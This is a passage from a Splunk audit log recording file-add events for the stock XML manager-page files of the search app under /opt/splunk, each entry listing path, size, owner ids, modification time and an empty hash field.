uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.851, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/login_page_settings.xml", isdir=0, size=192, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.846, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/licensing_stacks.xml", isdir=0, size=482, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.842, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/licensing_stacks.prod_lite.xml", isdir=0, size=403, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.839, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/licensing_notes.xml", isdir=0, size=117, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.836, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/license_usage.xml", isdir=0, size=140, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.832, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/job_inspector.xml", isdir=0, size=84, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.829, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/health_manager.xml", isdir=0, size=474, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.824, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/global_banner.xml", isdir=0, size=196, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.820, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/fwd_win-event-log-collections.xml", isdir=0, size=5135, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.816, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/fwd_data_inputs_udp.xml", isdir=0, size=10838, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.812, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/fwd_data_inputs_tcp_raw.xml", isdir=0, size=10294, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.808, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/fwd_data_inputs_script.xml", isdir=0, size=7993, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.803, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/fwd_data_inputs_monitor.xml", isdir=0, size=16595, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.799, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/fwd_admin_win-perfmon.xml", isdir=0, size=8917, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.795, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/forwardreceive.xml", isdir=0, size=485, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.791, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/forwardreceive.prod_lite.xml", isdir=0, size=385, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.788, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/fields.xml", isdir=0, size=360, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.784, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/explore_data.xml", isdir=0, size=62, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.781, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/duo_mfa.xml", isdir=0, size=2549, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.776, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/distsearch.xml", isdir=0, size=473, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.772, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/deploymentserveredit.xml", isdir=0, size=70, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.768, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/deploymentserver_edit_app.xml", isdir=0, size=75, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.765, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/deploymentserver_apps_detail.xml", isdir=0, size=78, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.761, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/deploymentserver_add_clients.xml", isdir=0, size=78, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.758, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/deploymentserver_add_apps.xml", isdir=0, size=75, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.754, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/deployment_client.xml", isdir=0, size=1407, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.751, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/deployment.xml", isdir=0, size=559, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.747, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/deployment.prod_lite.xml", isdir=0, size=526, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.744, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/deployment.federated_search.xml", isdir=0, size=402, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.740, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/deployment.env_cloud.xml", isdir=0, size=531, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.736, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/deployment.data_fabric.xml", isdir=0, size=416, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.732, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/datainputstats.xml", isdir=0, size=732, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.729, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/datainputstats.env_cloud.xml", isdir=0, size=731, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.725, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_ui_views.xml", isdir=0, size=2008, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.721, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_ui_times.xml", isdir=0, size=3255, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.718, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_ui_panels.xml", isdir=0, size=128, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.707, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_ui_panels.prod_lite.xml", isdir=0, size=189, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.703, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_ui_nav.xml", isdir=0, size=2073, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.698, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_ui_messages.xml", isdir=0, size=781, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.692, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_ui_messages.prod_lite.xml", isdir=0, size=678, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.688, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_ui_field_actions.xml", isdir=0, size=10711, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.683, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_transforms_lookups.xml", isdir=0, size=19152, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.680, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_transforms_extractions.xml", isdir=0, size=4433, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.676, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_props_sourcetype_rename.xml", isdir=0, size=1370, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.671, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_props_lookups.xml", isdir=0, size=3803, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.666, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_props_field_aliases.xml", isdir=0, size=2666, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.661, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_props_extractions.xml", isdir=0, size=2579, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.657, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_props_calc_fields.xml", isdir=0, size=2382, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.654, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_outputs_tcp_server.xml", isdir=0, size=1371, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.650, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_outputs_tcp_default.xml", isdir=0, size=1226, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.646, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_model.xml", isdir=0, size=404, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.642, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_lookup_table_files.xml", isdir=0, size=1996, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.638, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_inputs_udp.xml", isdir=0, size=10349, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.634, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_inputs_tcp_raw.xml", isdir=0, size=9796, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.629, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_inputs_tcp_cooked.xml", isdir=0, size=1356, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.625, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_inputs_tcp_cooked.prod_lite.xml", isdir=0, size=1267, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.619, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_inputs_script.xml", isdir=0, size=7658, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.613, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_inputs_monitor.xml", isdir=0, size=16334, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.594, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_inputs_http.xml", isdir=0, size=183, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.588, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_inputs_http.env_cloud.xml", isdir=0, size=180, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.583, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_indexes.xml", isdir=0, size=478, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.578, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_indexes.prod_lite.env_cloud.xml", isdir=0, size=462, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.574, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/data_indexes.env_cloud.xml", isdir=0, size=456, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.568, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/dashboards.xml", isdir=0, size=82, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.564, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/control.xml", isdir=0, size=412, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.560, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/control.prod_lite.xml", isdir=0, size=331, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.555, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/control.env_cloud.xml", isdir=0, size=396, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.552, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/clustering_push.xml", isdir=0, size=168, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.546, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/clustering_bucket_details.xml", isdir=0, size=206, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.542, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/clustering.xml", isdir=0, size=535, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.537, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/bulkreassign.xml", isdir=0, size=175, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.532, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/authoverview.xml", isdir=0, size=445, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.527, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/authentication_users.xml", isdir=0, size=445, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.523, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/authentication_users.prod_lite.xml", isdir=0, size=568, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.518, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/authentication_roles.xml", isdir=0, size=471, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.514, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/authentication_providers_Splunk.xml", isdir=0, size=329, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.510, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/authentication_ldap_settings.xml", isdir=0, size=11895, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.505, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/authentication_ldap_groups.xml", isdir=0, size=1667, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.499, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/authentication_change_user_password.xml", isdir=0, size=142, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.496, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/authentication_change_user_password.prod_lite.xml", isdir=0, size=140, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.492, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/archive_new.xml", isdir=0, size=61, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.486, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/archive_management.env_cloud.xml", isdir=0, size=105, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.482, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/apps_local.xml", isdir=0, size=3452, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.478, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/apps_local.prod_lite.xml", isdir=0, size=424, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.473, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/apps_local.prod_lite.env_cloud.xml", isdir=0, size=424, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.468, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/apps_local.env_cloud.xml", isdir=0, size=3368, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.464, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/alerts.xml", isdir=0, size=78, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.460, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/alert_email.xml", isdir=0, size=13702, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.454, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/alert_email.prod_lite.xml", isdir=0, size=13495, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.450, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/alert_email.prod_lite.env_cloud.xml", isdir=0, size=13712, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.447, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/alert_email.env_cloud.xml", isdir=0, size=13740, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.443, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/alert_actions.xml", isdir=0, size=444, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.439, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/advancedsearch.xml", isdir=0, size=376, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.435, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/admin_win-wmi-collections.xml", isdir=0, size=8881, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.432, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/admin_win-regmon.xml", isdir=0, size=8799, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.428, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/admin_win-printmon.xml", isdir=0, size=4859, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.424, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/admin_win-perfmon.xml", isdir=0, size=8342, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.420, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/admin_win-netmon.xml", isdir=0, size=10157, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.417, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/admin_win-hostmon.xml", isdir=0, size=6598, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.412, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/admin_win-event-log-collections.xml", isdir=0, size=6103, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.408, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/admin_win-admon.xml", isdir=0, size=3715, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.403, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/admin_tags.xml", isdir=0, size=1507, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.400, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/admin_ntags.xml", isdir=0, size=1716, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.396, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/admin_macros.xml", isdir=0, size=3234, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.393, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/admin_macros.prod_lite.xml", isdir=0, size=3515, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.389, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/admin_fvtags.xml", isdir=0, size=1885, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.384, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/admin_directory.xml", isdir=0, size=960, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.379, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/admin_directory.prod_lite.xml", isdir=0, size=1001, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.374, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/admin_commands.xml", isdir=0, size=1397, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.370, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/adddatamethods.xml", isdir=0, size=522, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.367, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/adddatamethods.env_cloud.xml", isdir=0, size=521, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.363, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/adddata.xml", isdir=0, size=550, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.360, user=n/a, action=add,path="/opt/splunk/etc/apps/search/default/data/ui/manager/adddata.env_cloud.xml", isdir=0, size=549, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:42.355, user=n/a, 